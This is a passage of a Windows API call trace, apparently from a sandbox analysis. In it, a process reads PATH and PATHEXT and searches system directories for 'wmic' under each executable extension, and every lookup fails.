lpAddress=0x1c90da30, lpBuffer=0x1c90e8f0, dwLength=0x30 | out: lpBuffer=0x1c90e8f0*(BaseAddress=0x1c90d000, AllocationBase=0x1bf80000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0250.240] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0250.240] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0250.240] CoTaskMemFree (pv=0x2af7b0) [0250.240] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0250.240] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0250.240] CoTaskMemFree (pv=0x2af7b0) [0250.241] CoTaskMemAlloc (cb=0x20e) returned 0x2bcb00 [0250.241] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bcb00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0250.241] CoTaskMemFree (pv=0x2bcb00) [0250.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.241] SetErrorMode (uMode=0x1) returned 0x1 [0250.242] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.242] SetErrorMode (uMode=0x1) returned 0x1 [0250.242] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.243] SetErrorMode (uMode=0x1) returned 0x1 [0250.243] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.243] SetErrorMode (uMode=0x1) returned 0x1 [0250.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.244] SetErrorMode (uMode=0x1) returned 0x1 [0250.244] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.244] SetErrorMode (uMode=0x1) returned 0x1 [0250.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.245] SetErrorMode (uMode=0x1) returned 0x1 [0250.245] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.246] SetErrorMode (uMode=0x1) returned 0x1 [0250.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.246] SetErrorMode (uMode=0x1) returned 0x1 [0250.246] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.247] SetErrorMode (uMode=0x1) returned 0x1 [0250.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.247] SetErrorMode (uMode=0x1) returned 0x1 [0250.247] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.248] SetErrorMode (uMode=0x1) returned 0x1 [0250.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.249] SetErrorMode (uMode=0x1) returned 0x1 [0250.249] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.249] SetErrorMode (uMode=0x1) returned 0x1 [0250.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.249] SetErrorMode (uMode=0x1) returned 0x1 [0250.250] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.250] SetErrorMode (uMode=0x1) returned 0x1 [0250.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.250] SetErrorMode (uMode=0x1) returned 0x1 [0250.250] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.251] SetErrorMode (uMode=0x1) returned 0x1 [0250.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.251] SetErrorMode (uMode=0x1) returned 0x1 [0250.251] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.252] SetErrorMode (uMode=0x1) returned 0x1 [0250.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.252] SetErrorMode (uMode=0x1) returned 0x1 [0250.252] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.252] SetErrorMode (uMode=0x1) returned 0x1 [0250.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.253] SetErrorMode (uMode=0x1) returned 0x1 [0250.253] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.253] SetErrorMode (uMode=0x1) returned 0x1 [0250.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.254] SetErrorMode (uMode=0x1) returned 0x1 [0250.254] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.254] SetErrorMode (uMode=0x1) returned 0x1 [0250.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.255] SetErrorMode (uMode=0x1) returned 0x1 [0250.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.255] SetErrorMode (uMode=0x1) returned 0x1 [0250.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0250.256] SetErrorMode (uMode=0x1) returned 0x1 [0250.256] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.256] SetErrorMode (uMode=0x1) returned 0x1 [0250.256] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.256] SetErrorMode (uMode=0x1) returned 0x1 [0250.257] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.257] SetErrorMode (uMode=0x1) returned 0x1 [0250.257] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.257] SetErrorMode (uMode=0x1) returned 0x1 [0250.257] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.258] SetErrorMode (uMode=0x1) returned 0x1 [0250.258] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.258] SetErrorMode (uMode=0x1) returned 0x1 [0250.258] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.259] SetErrorMode (uMode=0x1) returned 0x1 [0250.259] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.259] SetErrorMode (uMode=0x1) returned 0x1 [0250.259] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.260] SetErrorMode (uMode=0x1) returned 0x1 [0250.260] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.260] SetErrorMode (uMode=0x1) returned 0x1 [0250.260] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.260] SetErrorMode (uMode=0x1) returned 0x1 [0250.261] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.261] SetErrorMode (uMode=0x1) returned 0x1 [0250.261] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.261] SetErrorMode (uMode=0x1) returned 0x1 [0250.261] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.262] SetErrorMode (uMode=0x1) returned 0x1 [0250.262] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.262] SetErrorMode (uMode=0x1) returned 0x1 [0250.262] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.263] SetErrorMode (uMode=0x1) returned 0x1 [0250.263] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.263] SetErrorMode (uMode=0x1) returned 0x1 [0250.263] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.263] SetErrorMode (uMode=0x1) returned 0x1 [0250.264] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.264] SetErrorMode (uMode=0x1) returned 0x1 [0250.264] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.264] SetErrorMode (uMode=0x1) returned 0x1 [0250.264] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.265] SetErrorMode (uMode=0x1) returned 0x1 [0250.265] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.265] SetErrorMode (uMode=0x1) returned 0x1 [0250.265] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.266] SetErrorMode (uMode=0x1) returned 0x1 [0250.266] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.266] SetErrorMode (uMode=0x1) returned 0x1 [0250.266] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.266] SetErrorMode (uMode=0x1) returned 0x1 [0250.267] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.267] SetErrorMode (uMode=0x1) returned 0x1 [0250.267] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.267] SetErrorMode (uMode=0x1) returned 0x1 [0250.267] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.268] SetErrorMode (uMode=0x1) returned 0x1 [0250.268] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.268] SetErrorMode (uMode=0x1) returned 0x1 [0250.268] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0250.268] SetErrorMode (uMode=0x1) returned 0x1 [0250.269] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c90d960 | out: lpFindFileData=0x1c90d960*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0250.269] SetErrorMode (uMode=0x1) returned 0x1 [0250.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c90d7c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", 